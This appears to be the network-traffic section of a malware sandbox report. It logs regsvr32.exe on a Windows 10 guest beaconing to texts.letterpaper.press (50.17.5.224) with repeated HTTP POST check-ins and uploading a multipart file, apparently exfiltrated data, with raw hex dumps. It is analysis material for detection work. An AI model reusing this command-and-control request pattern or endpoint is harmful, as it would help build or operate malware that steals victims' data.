                Aug 25, 2021 10:59:30.565089941 CEST804970550.17.5.224192.168.1.103
                Aug 25, 2021 10:59:30.565445900 CEST4970480192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:30.565507889 CEST4970580192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:30.572340012 CEST4970480192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:30.574069023 CEST4970580192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:31.581434965 CEST804970550.17.5.224192.168.1.103
                Aug 25, 2021 10:59:31.581552029 CEST804970450.17.5.224192.168.1.103
                Aug 25, 2021 10:59:33.537187099 CEST4970480192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:33.537286043 CEST4970580192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:33.556792021 CEST4970680192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:33.556942940 CEST4970780192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:34.639801025 CEST804970650.17.5.224192.168.1.103
                Aug 25, 2021 10:59:34.639833927 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:34.639992952 CEST4970680192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:34.640032053 CEST4970780192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:34.642611980 CEST4970780192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:34.642957926 CEST4970680192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:34.643527985 CEST4970780192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:35.661135912 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:35.661164045 CEST804970650.17.5.224192.168.1.103
                Aug 25, 2021 10:59:35.661226988 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:35.661252022 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:35.661269903 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:35.661277056 CEST4970780192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:35.661288023 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:35.661304951 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:35.661322117 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:35.661339998 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:35.661356926 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:35.661392927 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:35.661452055 CEST4970780192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:35.661602974 CEST4970780192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:36.681767941 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:36.681782961 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:36.681806087 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:36.681838036 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:36.681869030 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:36.681891918 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:36.681926012 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:36.681931973 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:36.681941032 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:36.681967974 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:36.681978941 CEST4970780192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:36.681998014 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:36.682029963 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:36.682043076 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:36.682063103 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:36.682080030 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:36.682091951 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:36.682104111 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:36.682116032 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:36.682128906 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:36.682291031 CEST4970780192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:37.702325106 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:37.702358961 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:37.702375889 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:37.702392101 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:37.702409029 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:37.702424049 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:37.702440977 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:37.702455997 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:37.702472925 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:37.702486038 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:37.702501059 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:37.702500105 CEST4970780192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:37.702513933 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:37.702528954 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:37.702544928 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:37.702558994 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:37.702574015 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:37.702589035 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:37.702605963 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:37.702622890 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:37.702640057 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:37.702645063 CEST4970780192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:37.702655077 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:37.702672005 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:37.702689886 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:37.702707052 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:37.702722073 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:37.702739954 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:37.702784061 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:37.702801943 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:37.702819109 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:37.702835083 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:37.702851057 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:37.702864885 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:37.702881098 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:37.702897072 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:37.702912092 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:37.702927113 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:37.702943087 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:37.702955961 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:38.635447979 CEST4970680192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:38.635652065 CEST4970780192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:38.724632978 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:38.724666119 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:38.724678040 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:38.724688053 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:38.724699020 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:38.724710941 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:38.724723101 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:38.724735022 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:38.724775076 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:38.724791050 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:38.724870920 CEST4970780192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:38.724900961 CEST4970780192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:38.724909067 CEST4970780192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:38.724915981 CEST4970780192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:38.724922895 CEST4970780192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:38.724927902 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:38.724930048 CEST4970780192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:38.724937916 CEST4970780192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:38.724941969 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:38.724950075 CEST4970780192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:38.724953890 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:38.725025892 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:38.725048065 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:38.725066900 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:38.725080013 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:38.725091934 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:38.725136995 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:38.725151062 CEST804970750.17.5.224192.168.1.103
                Aug 25, 2021 10:59:38.725153923 CEST4970780192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:38.725169897 CEST4970780192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:38.725178957 CEST4970780192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:38.725186110 CEST4970780192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:38.725195885 CEST4970780192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:38.725203991 CEST4970780192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:38.725212097 CEST4970780192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:38.725219011 CEST4970780192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:38.725224972 CEST4970780192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:38.725231886 CEST4970780192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:38.725662947 CEST4970780192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:38.725672960 CEST4970780192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:46.890233994 CEST4970980192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:46.890754938 CEST4970880192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:47.896063089 CEST804970850.17.5.224192.168.1.103
                Aug 25, 2021 10:59:47.896146059 CEST804970950.17.5.224192.168.1.103
                Aug 25, 2021 10:59:47.896317959 CEST4970880192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:47.896436930 CEST4970980192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:47.898830891 CEST4970880192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:47.899632931 CEST4970980192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:48.920011044 CEST804970850.17.5.224192.168.1.103
                Aug 25, 2021 10:59:48.920100927 CEST804970950.17.5.224192.168.1.103
                Aug 25, 2021 10:59:50.886939049 CEST4970880192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:50.886996031 CEST4970980192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:50.890595913 CEST4971080192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:50.891681910 CEST4971180192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:51.977365971 CEST804971050.17.5.224192.168.1.103
                Aug 25, 2021 10:59:51.977391958 CEST804971150.17.5.224192.168.1.103
                Aug 25, 2021 10:59:51.977564096 CEST4971080192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:51.977603912 CEST4971180192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:53.001545906 CEST4971080192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:53.001627922 CEST4971180192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:54.015885115 CEST804971050.17.5.224192.168.1.103
                Aug 25, 2021 10:59:54.015922070 CEST804971150.17.5.224192.168.1.103
                Aug 25, 2021 10:59:56.983951092 CEST4971080192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:56.984018087 CEST4971180192.168.1.10350.17.5.224
                Aug 25, 2021 10:59:59.567550898 CEST4971280192.168.1.10350.17.5.224
                Aug 25, 2021 11:00:00.153429031 CEST804971250.17.5.224192.168.1.103
                Aug 25, 2021 11:00:00.153877974 CEST4971280192.168.1.10350.17.5.224
                Aug 25, 2021 11:00:02.255054951 CEST4971380192.168.1.10350.17.5.224
                Aug 25, 2021 11:00:02.361629009 CEST4971280192.168.1.10350.17.5.224
                Aug 25, 2021 11:00:03.210583925 CEST804971350.17.5.224192.168.1.103
                Aug 25, 2021 11:00:03.210972071 CEST4971380192.168.1.10350.17.5.224
                Aug 25, 2021 11:00:03.214108944 CEST804971250.17.5.224192.168.1.103
                Aug 25, 2021 11:00:04.199266911 CEST4971380192.168.1.10350.17.5.224
                Aug 25, 2021 11:00:04.640214920 CEST4971280192.168.1.10350.17.5.224
                Aug 25, 2021 11:00:04.640270948 CEST4971380192.168.1.10350.17.5.224
                Aug 25, 2021 11:00:05.159560919 CEST4971480192.168.1.10350.17.5.224
                Aug 25, 2021 11:00:05.160320044 CEST4971580192.168.1.10350.17.5.224
                Aug 25, 2021 11:00:05.251550913 CEST804971350.17.5.224192.168.1.103
                Aug 25, 2021 11:00:05.251750946 CEST4971380192.168.1.10350.17.5.224
                Aug 25, 2021 11:00:06.270332098 CEST804971450.17.5.224192.168.1.103
                Aug 25, 2021 11:00:06.270401001 CEST804971550.17.5.224192.168.1.103
                Aug 25, 2021 11:00:06.270581961 CEST4971480192.168.1.10350.17.5.224
                Aug 25, 2021 11:00:06.270631075 CEST4971580192.168.1.10350.17.5.224
                Aug 25, 2021 11:00:06.274193048 CEST4971480192.168.1.10350.17.5.224
                Aug 25, 2021 11:00:06.274682999 CEST4971580192.168.1.10350.17.5.224
                Aug 25, 2021 11:00:07.286349058 CEST804971450.17.5.224192.168.1.103
                Aug 25, 2021 11:00:07.286377907 CEST804971550.17.5.224192.168.1.103
                Aug 25, 2021 11:00:10.282649994 CEST4971480192.168.1.10350.17.5.224
                Aug 25, 2021 11:00:10.282713890 CEST4971580192.168.1.10350.17.5.224
                Aug 25, 2021 11:00:10.287846088 CEST4971680192.168.1.10350.17.5.224
                Aug 25, 2021 11:00:10.291549921 CEST4971780192.168.1.10350.17.5.224
                Aug 25, 2021 11:00:11.379347086 CEST804971650.17.5.224192.168.1.103
                Aug 25, 2021 11:00:11.379393101 CEST804971750.17.5.224192.168.1.103
                Aug 25, 2021 11:00:11.379652977 CEST4971680192.168.1.10350.17.5.224
                Aug 25, 2021 11:00:11.379710913 CEST4971780192.168.1.10350.17.5.224
                Aug 25, 2021 11:00:11.381393909 CEST4971680192.168.1.10350.17.5.224
                Aug 25, 2021 11:00:11.381963015 CEST4971780192.168.1.10350.17.5.224
                Aug 25, 2021 11:00:12.400235891 CEST804971750.17.5.224192.168.1.103
                Aug 25, 2021 11:00:12.400268078 CEST804971650.17.5.224192.168.1.103
                Aug 25, 2021 11:00:14.320501089 CEST4971680192.168.1.10350.17.5.224
                Aug 25, 2021 11:00:14.320796013 CEST4971780192.168.1.10350.17.5.224
                Aug 25, 2021 11:00:14.325417042 CEST4971880192.168.1.10350.17.5.224
                Aug 25, 2021 11:00:14.327869892 CEST4971980192.168.1.10350.17.5.224
                Aug 25, 2021 11:00:15.463325024 CEST804971950.17.5.224192.168.1.103
                Aug 25, 2021 11:00:15.463360071 CEST804971850.17.5.224192.168.1.103
                Aug 25, 2021 11:00:15.463803053 CEST4971980192.168.1.10350.17.5.224
                Aug 25, 2021 11:00:15.463856936 CEST4971880192.168.1.10350.17.5.224
                Aug 25, 2021 11:00:15.465219021 CEST4971980192.168.1.10350.17.5.224
                Aug 25, 2021 11:00:15.465665102 CEST4971880192.168.1.10350.17.5.224
                Aug 25, 2021 11:00:16.485071898 CEST804971950.17.5.224192.168.1.103
                Aug 25, 2021 11:00:16.485090971 CEST804971850.17.5.224192.168.1.103
                Aug 25, 2021 11:00:19.466814041 CEST4971980192.168.1.10350.17.5.224
                Aug 25, 2021 11:00:19.466906071 CEST4971880192.168.1.10350.17.5.224

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Aug 25, 2021 10:58:42.886847973 CEST5328353192.168.1.1038.8.8.8
                Aug 25, 2021 10:58:42.900681973 CEST5635053192.168.1.1038.8.8.8
                Aug 25, 2021 10:58:42.922656059 CEST53532838.8.8.8192.168.1.103
                Aug 25, 2021 10:58:42.935491085 CEST53563508.8.8.8192.168.1.103
                Aug 25, 2021 10:58:43.918929100 CEST5635053192.168.1.1038.8.8.8
                Aug 25, 2021 10:58:43.919034004 CEST5328353192.168.1.1038.8.8.8
                Aug 25, 2021 10:58:43.953783989 CEST53563508.8.8.8192.168.1.103
                Aug 25, 2021 10:58:43.958594084 CEST53532838.8.8.8192.168.1.103
                Aug 25, 2021 10:58:44.921052933 CEST5328353192.168.1.1038.8.8.8
                Aug 25, 2021 10:58:44.921231985 CEST5635053192.168.1.1038.8.8.8
                Aug 25, 2021 10:58:44.953270912 CEST53532838.8.8.8192.168.1.103
                Aug 25, 2021 10:58:44.954113960 CEST53563508.8.8.8192.168.1.103
                Aug 25, 2021 10:58:46.958601952 CEST5635053192.168.1.1038.8.8.8
                Aug 25, 2021 10:58:46.958714008 CEST5328353192.168.1.1038.8.8.8
                Aug 25, 2021 10:58:46.984656096 CEST53563508.8.8.8192.168.1.103
                Aug 25, 2021 10:58:46.990740061 CEST53532838.8.8.8192.168.1.103
                Aug 25, 2021 10:58:49.492527962 CEST6403053192.168.1.1038.8.8.8
                Aug 25, 2021 10:58:49.525954008 CEST53640308.8.8.8192.168.1.103
                Aug 25, 2021 10:58:50.971241951 CEST5328353192.168.1.1038.8.8.8
                Aug 25, 2021 10:58:50.971344948 CEST5635053192.168.1.1038.8.8.8
                Aug 25, 2021 10:58:51.003259897 CEST53532838.8.8.8192.168.1.103
                Aug 25, 2021 10:58:51.004323959 CEST53563508.8.8.8192.168.1.103
                Aug 25, 2021 10:59:24.717525005 CEST6068553192.168.1.1038.8.8.8
                Aug 25, 2021 10:59:24.932656050 CEST53606858.8.8.8192.168.1.103
                Aug 25, 2021 10:59:27.738946915 CEST5229553192.168.1.1038.8.8.8
                Aug 25, 2021 10:59:27.772903919 CEST53522958.8.8.8192.168.1.103

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                Aug 25, 2021 10:59:24.717525005 CEST192.168.1.1038.8.8.80xfd73Standard query (0)texts.letterpaper.pressA (IP address)IN (0x0001)

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                Aug 25, 2021 10:59:24.932656050 CEST8.8.8.8192.168.1.1030xfd73No error (0)texts.letterpaper.press50.17.5.224A (IP address)IN (0x0001)

                HTTP Request Dependency Graph

                • texts.letterpaper.press

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.1.1034970050.17.5.22480C:\Windows\System32\regsvr32.exe
                TimestampkBytes transferredDirectionData
                Aug 25, 2021 10:59:25.488600016 CEST5OUTPOST //?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                Host: texts.letterpaper.press
                Content-Length: 0
                Cache-Control: no-cache


                Session IDSource IPSource PortDestination IPDestination PortProcess
                1192.168.1.1034970150.17.5.22480C:\Windows\System32\regsvr32.exe
                TimestampkBytes transferredDirectionData
                Aug 25, 2021 10:59:25.488651991 CEST5OUTPOST //?m=c&p1=8ace1190 HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                Host: texts.letterpaper.press
                Content-Length: 0
                Cache-Control: no-cache
                Aug 25, 2021 10:59:26.413067102 CEST5OUTPOST //?m=c&p1=8ace1190 HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                Host: texts.letterpaper.press
                Content-Length: 0
                Cache-Control: no-cache


                Session IDSource IPSource PortDestination IPDestination PortProcess
                10192.168.1.1034971250.17.5.22480C:\Windows\System32\regsvr32.exe
                TimestampkBytes transferredDirectionData
                Aug 25, 2021 11:00:02.361629009 CEST72OUTPOST //?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                Host: texts.letterpaper.press
                Content-Length: 0
                Cache-Control: no-cache


                Session IDSource IPSource PortDestination IPDestination PortProcess
                11192.168.1.1034971350.17.5.22480C:\Windows\System32\regsvr32.exe
                TimestampkBytes transferredDirectionData
                Aug 25, 2021 11:00:04.199266911 CEST73OUTPOST //?m=c&p1=8ace1190 HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                Host: texts.letterpaper.press
                Content-Length: 0
                Cache-Control: no-cache


                Session IDSource IPSource PortDestination IPDestination PortProcess
                12192.168.1.1034971450.17.5.22480C:\Windows\System32\regsvr32.exe
                TimestampkBytes transferredDirectionData
                Aug 25, 2021 11:00:06.274193048 CEST74OUTPOST //?m=c&p1=8ace1190 HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                Host: texts.letterpaper.press
                Content-Length: 0
                Cache-Control: no-cache


                Session IDSource IPSource PortDestination IPDestination PortProcess
                13192.168.1.1034971550.17.5.22480C:\Windows\System32\regsvr32.exe
                TimestampkBytes transferredDirectionData
                Aug 25, 2021 11:00:06.274682999 CEST74OUTPOST //?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                Host: texts.letterpaper.press
                Content-Length: 0
                Cache-Control: no-cache


                Session IDSource IPSource PortDestination IPDestination PortProcess
                14192.168.1.1034971650.17.5.22480C:\Windows\System32\regsvr32.exe
                TimestampkBytes transferredDirectionData
                Aug 25, 2021 11:00:11.381393909 CEST75OUTPOST //?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                Host: texts.letterpaper.press
                Content-Length: 0
                Cache-Control: no-cache


                Session IDSource IPSource PortDestination IPDestination PortProcess
                15192.168.1.1034971750.17.5.22480C:\Windows\System32\regsvr32.exe
                TimestampkBytes transferredDirectionData
                Aug 25, 2021 11:00:11.381963015 CEST75OUTPOST //?m=c&p1=8ace1190 HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                Host: texts.letterpaper.press
                Content-Length: 0
                Cache-Control: no-cache


                Session IDSource IPSource PortDestination IPDestination PortProcess
                16192.168.1.1034971950.17.5.22480C:\Windows\System32\regsvr32.exe
                TimestampkBytes transferredDirectionData
                Aug 25, 2021 11:00:15.465219021 CEST76OUTPOST //?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                Host: texts.letterpaper.press
                Content-Length: 0
                Cache-Control: no-cache


                Session IDSource IPSource PortDestination IPDestination PortProcess
                17192.168.1.1034971850.17.5.22480C:\Windows\System32\regsvr32.exe
                TimestampkBytes transferredDirectionData
                Aug 25, 2021 11:00:15.465665102 CEST76OUTPOST //?m=c&p1=8ace1190 HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                Host: texts.letterpaper.press
                Content-Length: 0
                Cache-Control: no-cache


                Session IDSource IPSource PortDestination IPDestination PortProcess
                2192.168.1.1034970450.17.5.22480C:\Windows\System32\regsvr32.exe
                TimestampkBytes transferredDirectionData
                Aug 25, 2021 10:59:30.572340012 CEST16OUTPOST //?m=c&p1=8ace1190 HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                Host: texts.letterpaper.press
                Content-Length: 0
                Cache-Control: no-cache


                Session IDSource IPSource PortDestination IPDestination PortProcess
                3192.168.1.1034970550.17.5.22480C:\Windows\System32\regsvr32.exe
                TimestampkBytes transferredDirectionData
                Aug 25, 2021 10:59:30.574069023 CEST16OUTPOST //?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                Host: texts.letterpaper.press
                Content-Length: 0
                Cache-Control: no-cache


                Session IDSource IPSource PortDestination IPDestination PortProcess
                4192.168.1.1034970750.17.5.22480C:\Windows\System32\regsvr32.exe
                TimestampkBytes transferredDirectionData
                Aug 25, 2021 10:59:34.642611980 CEST17OUTPOST //?m=b&p1=8ace1190&p2=c HTTP/1.1
                Content-Type: multipart/form-data; boundary=--7263b57d61acd27d98a454fc484795fe0106d5
                Content-Length: 45838
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                Host: texts.letterpaper.press
                Connection: Keep-Alive
                Cache-Control: no-cache
                Aug 25, 2021 10:59:34.643527985 CEST22OUTData Raw: 2d 2d 2d 2d 37 32 36 33 62 35 37 64 36 31 61 63 64 32 37 64 39 38 61 34 35 34 66 63 34 38 34 37 39 35 66 65 30 31 30 36 64 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22
                Data Ascii: ----7263b57d61acd27d98a454fc484795fe0106d5Content-Disposition: form-data; name="binary"; filename="2021-08-25_10-59-22-966"Content-Type: application/octet-stream%PDF-1.7..4 0 objKM!Xk'u:U?0krV}'+RnB)+gS+G
                Aug 25, 2021 10:59:35.661277056 CEST23OUTData Raw: c5 57 7e 60 22 09 99 1d e5 0d 1c 0f f9 02 1e 28 b2 e3 de fa c6 ae 3c d6 46 1b bf bf 24 cf 89 1d b0 80 54 e0 5f 77 2c 1f 2a 94 3d d9 fd d1 6b a8 8d 46 2e 58 31 c2 06 09 e1 a9 ec 57 03 20 a4 35 be 07 a2 90 1d 2d cf 2a 9f 24 07 28 5e c1 4d f2 b3 ca
                Data Ascii: W~`"(<F$T_w,*=kF.X1W 5-*$(^MP|}gJ]mPBvS_Y}#[#IL90?v`EaEkr; APc:%j4@FTX!vq!AS1kT^Nt]h&D[QS]G'@
                Aug 25, 2021 10:59:35.661452055 CEST31OUTData Raw: ea c6 d4 8c 6a 59 3d 46 3d 59 02 7a 59 d4 1a 04 1d cc 4b 28 3e 09 f7 51 aa f9 0e ca 5f e8 5c b0 f6 d0 ef 09 e0 9c c1 17 7f 7e 24 00 54 f1 65 2a 93 0e d8 84 3c 01 63 7e 25 0f ff af e1 31 31 0c 96 75 dd 31 a3 70 39 27 7e 5f 2b 5a 76 60 b1 a0 30 2a
                Data Ascii: jY=F=YzYK(>Q_\~$Te*<c~%11u1p9'~_+Zv`0* ].6]hC/n)4PJNo+H_+@}@1K\/eTBi1]1Po"mT(?`&47|%p,@Bq)^mkx3n V\=8[<
